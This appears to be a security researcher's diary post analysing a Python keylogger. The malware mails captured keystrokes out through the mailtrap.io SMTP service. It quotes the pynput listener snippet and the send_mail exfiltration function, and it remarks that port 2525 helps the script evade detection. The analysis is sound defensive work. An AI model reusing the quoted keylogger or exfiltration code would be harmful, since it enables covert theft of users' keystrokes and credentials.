I found another Python keylogger... This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:
from pynput import keyboard from pynput.keyboard import Listener ... keyboard_listener = keyboard.Listener(on_press=self.save_data) with keyboard_listener: self.report() keyboard_listener.join()
This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker's C2. These days, Discord is very popular. I also found many abused Google Mail accounts.
But, in this case, the attacker used another popular online service: mailtrap.io[1]. This service is "an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production". You may register a free account and get an environment to get emails for free! Mailtrap will provide an authenticated SMTP server to send them emails. Here is the code from the malicious script:
def send_mail(self, email, password, message): sender = "Private Person <[email protected]>" receiver = "A Test User <[email protected]>" m = f"""\ Subject: main Mailtrap To: {receiver} From: {sender} Keylogger by aydinnyunus\n""" m += message with smtplib.SMTP("smtp.mailtrap.io", 2525) as server: server.login(email, password) server.sendmail(sender, receiver, message)
Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the last port was used in the script because there are chances that it will be blocked in corporate environments. Otherwise, it's a nice way to fly below the radar...
Conclusion: another free online service (ab)used by attackers!
Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/ with a VT score of 8/61[2]
[1] https://mailtrap.io
[2] https://www.virustotal.com/gui/file/9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key